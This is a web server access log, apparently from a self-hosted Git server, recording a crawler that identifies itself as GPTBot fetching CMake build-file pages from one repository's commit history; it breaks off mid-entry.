"/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make?display=rendered" [Client 74.7.227.38] [Length 11082] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" -[17/Feb/2026:18:11:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt?display=rendered" [Client 74.7.227.38] [Length 11083] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" -[17/Feb/2026:18:11:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake?display=rendered" [Client 74.7.227.38] [Length 11090] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" -[17/Feb/2026:18:11:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make?display=source" [Client 74.7.227.38] [Length 11234] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" -[17/Feb/2026:18:11:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make?display=rendered" [Client 74.7.227.38] [Length 11084] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" -[17/Feb/2026:18:11:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt?display=rendered" [Client 74.7.227.38] [Length 11083] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" -[17/Feb/2026:18:11:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks?display=source" [Client 74.7.227.38] [Length 11183] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" -[17/Feb/2026:18:11:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d?display=rendered" [Client 74.7.227.38] [Length 11084] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" -[17/Feb/2026:18:11:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make?display=rendered" [Client 74.7.227.38] [Length 11085] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" -[17/Feb/2026:18:11:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make?display=source" [Client 74.7.227.38] [Length 15274] [Gzip 4.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" -[17/Feb/2026:18:11:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d?display=rendered" [Client 74.7.227.38] [Length 11084] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" -[17/Feb/2026:18:11:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make?display=rendered" [Client 74.7.227.38] [Length 11082] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" -[17/Feb/2026:18:11:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make?display=rendered" [Client 74.7.227.38] [Length 11086] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" -[17/Feb/2026:18:11:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make?display=source" [Client 74.7.227.38] [Length 11233] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" -[17/Feb/2026:18:11:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake?display=rendered" [Client 74.7.227.38] [Length 11091] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" -[17/Feb/2026:18:11:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make?display=source" [Client 74.7.227.38] [Length 24301] [Gzip 9.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" -[17/Feb/2026:18:11:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d?display=rendered" [Client 74.7.227.38] [Length 11083] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" -[17/Feb/2026:18:11:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake?display=source" [Client 74.7.227.38] [Length 11617] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" -[17/Feb/2026:18:11:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts?display=rendered" [Client 74.7.227.38] [Length 11099] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" -[17/Feb/2026:18:11:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make?display=rendered" [Client 74.7.227.38] [Length 11082] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" -[17/Feb/2026:18:11:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake?display=source" [Client 74.7.227.38] [Length 11619] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" -[17/Feb/2026:18:11:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt?display=rendered" [Client 74.7.227.38] [Length 11083] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" -[17/Feb/2026:18:11:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal?display=source" [Client 74.7.227.38] [Length 16060] [Gzip 5.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" -[17/Feb/2026:18:11:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts?display=rendered" [Client 74.7.227.38] [Length 11099] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" -[17/Feb/2026:18:11:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake?display=rendered" [Client 74.7.227.38] [Length 11089] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" -[17/Feb/2026:18:11:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts?display=rendered" [Client 74.7.227.38] [Length 11099] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" -[17/Feb/2026:18:11:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make?display=rendered" [Client 74.7.227.38] [Length 11082] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" -[17/Feb/2026:18:11:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make?display=rendered" [Client 74.7.227.38] [Length 11092] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" -[17/Feb/2026:18:11:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=source" [Client 74.7.227.38] [Length 15125] [Gzip 5.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:18:11:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make?display=source" [Client 74.7.227.38] [Length 11238] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" -[17/Feb/2026:18:11:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt?display=source" [Client 74.7.227.38] [Length 11200] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" -[17/Feb/2026:18:11:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make?display=source" [Client 74.7.227.38] [Length 24302] [Gzip 9.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" -[17/Feb/2026:18:11:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make?display=rendered" [Client 74.7.227.38] [Length 11091] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" -[17/Feb/2026:18:11:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt?display=rendered" [Client 74.7.227.38] [Length 11084] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" -[17/Feb/2026:18:11:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make?display=rendered" [Client 74.7.227.38] [Length 11084] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" -[17/Feb/2026:18:11:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make?display=source" [Client 74.7.227.38] [Length 11504] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" -[17/Feb/2026:18:11:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make?display=source" [Client 74.7.227.38] [Length 15274] [Gzip 4.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" -[17/Feb/2026:18:11:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make?display=source" [Client 74.7.227.38] [Length 11231] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" -[17/Feb/2026:18:11:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt?display=rendered" [Client 74.7.227.38] [Length 11083] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" -[17/Feb/2026:18:11:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make?display=rendered" [Client 74.7.227.38] [Length 11082] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" -[17/Feb/2026:18:11:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make?display=source" [Client 74.7.227.38] [Length 11237] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" -[17/Feb/2026:18:11:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make?display=source" [Client 74.7.227.38] [Length 11231] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" -[17/Feb/2026:18:11:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake?display=source" [Client 74.7.227.38] [Length 11620] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" -[17/Feb/2026:18:11:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks?display=rendered" [Client 74.7.227.38] [Length 11121] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" -[17/Feb/2026:18:11:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make?display=source" [Client 74.7.227.38] [Length 11232] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" -[17/Feb/2026:18:11:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make?display=rendered" [Client 74.7.227.38] [Length 11083] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 